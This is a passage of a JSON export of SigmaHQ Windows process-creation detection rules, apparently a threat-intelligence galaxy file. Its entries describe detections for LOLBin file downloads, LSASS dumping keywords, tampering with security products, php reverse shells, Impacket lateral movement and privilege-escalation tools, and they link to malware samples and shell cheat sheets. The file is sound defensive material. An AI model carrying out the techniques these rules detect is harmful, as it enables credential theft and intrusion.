"logsource.product": "windows", "refs": [ "https://bazaar.abuse.ch/sample/8c75f8e94486f5bbf461505823f5779f328c5b37f1387c18791e0c21f3fdd576/", "https://tria.ge/240521-ynezpagf56/behavioral1", "https://bazaar.abuse.ch/sample/64e6605496919cd76554915cbed88e56fdec10dec6523918a631754664b8c8d3/", "https://any.run/report/6eea2773c1b4b5c6fb7c142933e220c96f9a4ec89055bf0cf54accdcde7df535/a407f006-ee45-420d-b576-f259094df091", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitlockertogo_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7f2376f9-42ee-4dfc-9360-fecff9a88fc8", "value": "BitLockerTogo.EXE Execution" }, { "description": "Detects execution of the \"VMwareToolBoxCmd.exe\" with the \"script\" and \"set\" flag to setup a specific script to run for a specific VM state", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_vmware_toolbox_cmd_persistence.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/", "https://www.hexacorn.com/blog/2017/01/14/beyond-good-ol-run-key-part-53/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7aa4e81a-a65c-4e10-9f81-b200eb229d7d", "value": "Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script" }, { "description": "Detects uninstallation or termination of security products using the WMIC utility", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-01-30", "falsepositive": [ "Legitimate administration" ], "filename": "proc_creation_win_wmic_uninstall_security_products.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html", "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", "https://twitter.com/cglyer/status/1355171195654709249", "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_uninstall_security_products.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "847d5ff3-8a31-4737-a970-aeae8fe21765", "value": "Potential Tampering With Security Products Via WMIC" }, { "description": "Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy", "meta": { "author": "Janantha Marasinghe", "creation_date": "2022-11-18", "falsepositive": [ "Legitimate administrative use" ], "filename": "proc_creation_win_secedit_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_secedit_execution.yml" ], "tags": [ "attack.discovery", "attack.persistence", "attack.defense-evasion", "attack.credential-access", "attack.privilege-escalation", "attack.t1562.002", "attack.t1547.001", "attack.t1505.005", "attack.t1556.002", "attack.t1562", "attack.t1574.007", "attack.t1564.002", "attack.t1546.008", "attack.t1546.007", "attack.t1547.014", "attack.t1547.010", "attack.t1547.002", "attack.t1557", "attack.t1082" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "379809f6-2fac-42c1-bd2e-e9dee70b27f8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3731fbcd-0e43-47ae-ae6c-d15e510f0d42", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0c2d00da-7742-49e7-9928-4514e5075d32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "70e52b04-2a0c-4cea-9d18-7149f1df9dc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f63fe421-b1d1-45c0-b8a7-02cd16ff2bed", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "22522668-ddf6-470b-a027-9d6866679f67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "43881e51-ac74-445b-b4c6-f9f9e9bf23fe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b8cfed42-6a8a-4989-ad72-541af74475ec", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", "value": "Potential Suspicious Activity Using SeCEdit" }, { "description": "Detects the usage of the \"Squirrel.exe\" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community", "creation_date": "2022-06-09", "falsepositive": [ "Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.)" ], "filename": "proc_creation_win_squirrel_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/", "http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/", "http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_squirrel_download.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c", "value": "Arbitrary File Download Via Squirrel.EXE" }, { "description": "Detects execution of \"odbcconf\" with the \"INSTALLDRIVER\" action where the driver doesn't contain a \".dll\" extension. This is often used as a defense evasion method.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-23", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_odbcconf_driver_install_susp.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/", "https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176", "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.008" ] }, "related": [ { "dest-uuid": "6e3bd510-6b33-41a4-af80-2d80f3ee0071", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cb0fe7c5-f3a3-484d-aa25-d350a7912729", "value": "Suspicious Driver/DLL Installation Via Odbcconf.EXE" }, { "description": "Detects usage of the \"systeminfo\" command to retrieve information", "meta": { "author": "frack113", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_systeminfo_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-1---system-information-discovery", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_systeminfo_execution.yml" ], "tags": [ "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0ef56343-059e-4cb6-adc1-4c3c967c5e46", "value": "Suspicious Execution of Systeminfo" }, { "description": "Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-25", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.fortiguard.com/threat-signal-report/4718?s=09", "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/", "https://lolbas-project.github.io/lolbas/Binaries/Regasm/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.009" ] }, "related": [ { "dest-uuid": "c48a67ee-b657-45c1-91bf-6cdbe27205f8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cc368ed0-2411-45dc-a222-510ace303cb2", "value": "Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location" }, { "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs", "meta": { "author": "frack113", "creation_date": "2021-07-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218", "attack.t1216" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", "value": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code" }, { "description": "Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.", "meta": { "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "creation_date": "2022-06-02", "falsepositive": [ "Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg)." ], "filename": "proc_creation_win_lolbin_remote.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/", "https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml" ], "tags": [ "attack.defense-evasion", "attack.t1127" ] }, "related": [ { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4eddc365-79b4-43ff-a9d7-99422dc34b93", "value": "Use of Remote.exe" }, { "description": "Detects execution of Windows Defender \"OfflineScannerShell.exe\" from its non standard directory.\nThe \"OfflineScannerShell.exe\" binary is vulnerable to DLL side loading and will load any DLL named \"mpclient.dll\" from the current working directory.\n", "meta": { "author": "frack113", "creation_date": "2022-03-06", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_offlinescannershell_mpclient_sideloading.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_offlinescannershell_mpclient_sideloading.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "02b18447-ea83-4b1b-8805-714a8a34546a", "value": "Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution" }, { "description": "Detects the execution of a renamed version of the Plink binary", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-06", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_plink.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html", "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_plink.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", "value": "Renamed Plink Execution" }, { "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-31", "falsepositive": [ "Inline scripting can be used by some rare third party applications or administrators. Investigate and apply additional filters accordingly" ], "filename": "proc_creation_win_mshta_inline_vbscript.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.talosintelligence.com/modernloader-delivers-multiple-stealers-cryptominers-and-rats/", "https://web.archive.org/web/20220830122045/http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_inline_vbscript.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2c28c248-7f50-417a-9186-a85b223010ee", "value": "Wscript Shell Run In CommandLine" }, { "description": "Detects uncommon \"userinit.exe\" child processes, which could be a sign of uncommon shells or login scripts used for persistence.", "meta": { "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", "creation_date": "2019-01-12", "falsepositive": [ "Legitimate logon scripts or custom shells may trigger false positives. Apply additional filters accordingly." ], "filename": "proc_creation_win_userinit_uncommon_child_processes.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/server-core/server-core-sconfig#powershell-is-the-default-shell-on-server-core", "https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml" ], "tags": [ "attack.t1037.001", "attack.persistence" ] }, "related": [ { "dest-uuid": "eb125d40-0b2d-41ac-a71a-3229241c2cd3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", "value": "Uncommon Userinit Child Process" }, { "description": "Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)", "creation_date": "2024-01-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_pua_pingcastle_script_parent.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/802-1x/Compliance/blob/2e53df8b6e89686a0b91116b3f42c8f717dca820/Ping%20Castle/Get-PingCastle-HTMLComplianceReport.ps1#L8", "https://github.com/projectHULK/AD_Recon/blob/dde2daba9b3393a9388cbebda87068972cc0bd3b/SecurityAssessment.ps1#L2699", "https://github.com/EvotecIT/TheDashboard/blob/481a9ce8f82f2fd55fe65220ee6486bae6df0c9d/Examples/RunReports/PingCastle.ps1", "https://github.com/lkys37en/Start-ADEnum/blob/5b42c54215fe5f57fc59abc52c20487d15764005/Functions/Start-ADEnum.ps1#L680", "https://github.com/fengjixuchui/Start-ADEnum/blob/e237a739db98b6104427d833004836507da36a58/Functions/Start-ADEnum.ps1#L450", "https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/", "https://github.com/vletoux/pingcastle", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_pingcastle_script_parent.yml" ], "tags": [ "attack.reconnaissance", "attack.t1595" ] }, "related": [ { "dest-uuid": "67073dde-d720-45ae-83da-b12d5e73ca3b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b37998de-a70b-4f33-b219-ec36bf433dc0", "value": "PUA - PingCastle Execution From Potentially Suspicious Parent" }, { "description": "Detects the use of DISM to enable the PowerShell Web Access feature, which could be used for remote access and potential abuse", "meta": { "author": "Michael Haag", "creation_date": "2024-09-03", "falsepositive": [ "Legitimate PowerShell Web Access installations by administrators" ], "filename": "proc_creation_win_dism_enable_powershell_web_access_feature.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a", "https://gist.github.com/MHaggis/7e67b659af9148fa593cf2402edebb41", "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dism_enable_powershell_web_access_feature.yml" ], "tags": [ "attack.persistence", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7e8f2d3b-9c1a-4f67-b9e8-8d9006e0e51f", "value": "PowerShell Web Access Feature Enabled Via DISM" }, { "description": "Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension", "meta": { "author": "Aedan Russell, frack113, X__Junior (Nextron Systems)", "creation_date": "2022-06-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_browsers_chromium_susp_load_extension.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://emkc.org/s/RJjuLa", "https://redcanary.com/blog/chromeloader/", "https://www.mandiant.com/resources/blog/lnk-between-browsers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml" ], "tags": [ "attack.persistence", "attack.t1176" ] }, "related": [ { "dest-uuid": "389735f1-f21c-4208-b8f0-f8031e7169b8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "27ba3207-dd30-4812-abbf-5d20c57d474e", "value": "Suspicious Chromium Browser Instance Executed With Custom Extension" }, { "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", "meta": { "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", "creation_date": "2019-09-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py", "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py", "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py", "https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html", "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml" ], "tags": [ "attack.execution", "attack.t1047", "attack.lateral-movement", "attack.t1021.003" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "10c14723-61c7-4c75-92ca-9af245723ad2", "value": "HackTool - Potential Impacket Lateral Movement Activity" }, { "description": "Detects execution of regsvr32 where the DLL is located in a potentially suspicious location.", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-26", "falsepositive": [ "Some installers might execute \"regsvr32\" with DLLs located in %TEMP% or in %PROGRAMDATA%. Apply additional filters if necessary." ], "filename": "proc_creation_win_regsvr32_susp_exec_path_1.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html", "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.010" ] }, "related": [ { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9525dc73-0327-438c-8c04-13c0e037e9da", "value": "Regsvr32 Execution From Potential Suspicious Location" }, { "description": "Detects the presence of the keywords \"lsass\" and \".dmp\" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.\n", "meta": { "author": "E.M. Anhaus, Tony Lambert, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-10-24", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_susp_lsass_dmp_cli_keywords.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/", "https://github.com/helpsystems/nanodump", "https://github.com/Hackndo/lsassy", "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml", "https://github.com/CCob/MirrorDump", "https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ffa6861c-4461-4f59-8a41-578c39f3f23e", "value": "LSASS Dump Keyword In CommandLine" }, { "description": "Attackers can use print.exe for remote file copy", "meta": { "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", "creation_date": "2020-10-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_print_remote_file_copy.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/Oddvarmoe/status/985518877076541440", "https://lolbas-project.github.io/lolbas/Binaries/Print/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bafac3d6-7de9-4dd9-8874-4a1194b493ed", "value": "Abusing Print Executable" }, { "description": "Detects the use of SharpUp, a tool for local privilege escalation", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-08-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_sharpup.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/GhostPack/SharpUp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpup.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1615", "attack.t1569.002", "attack.t1574.005" ] }, "related": [ { "dest-uuid": "1b20efbf-8063-4fc3-a07d-b575318a301b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "70d81154-b187-45f9-8ec5-295d01255979", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", "value": "HackTool - SharpUp PrivEsc Tool Execution" }, { "description": "Detects execution of php using the \"-r\" flag. This is could be used as a way to launch a reverse shell or execute live php code.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_php_inline_command_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.php.net/manual/en/features.commandline.php", "https://www.revshells.com/", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_php_inline_command_execution.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d81871ef-5738-47ab-9797-7a9c90cd4bfb", "value": "Php Inline Command Execution" }, { "description": "Detects potentially suspicious file downloads directly from IP addresses using Wget.exe", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-07-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wget_download_direct_ip.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.gnu.org/software/wget/manual/wget.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wget_download_direct_ip.yml" ], "tags": [ "attack.execution" ] }, "uuid": "17f0c0a8-8bd5-4ee0-8c5f-a342c0199f35", "value": "Suspicious File Download From IP Via Wget.EXE" }, { "description": "Detects when a possible suspicious driver is being installed via pnputil.exe lolbin", "meta": { "author": "Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger", "creation_date": "2021-09-30", "falsepositive": [ "Pnputil.exe being used may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html", "https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" ], "tags": [ "attack.persistence", "attack.t1547" ] }, "related": [ { "dest-uuid": "1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", "value": "Suspicious Driver Install by pnputil.exe" }, { "description": "Detects 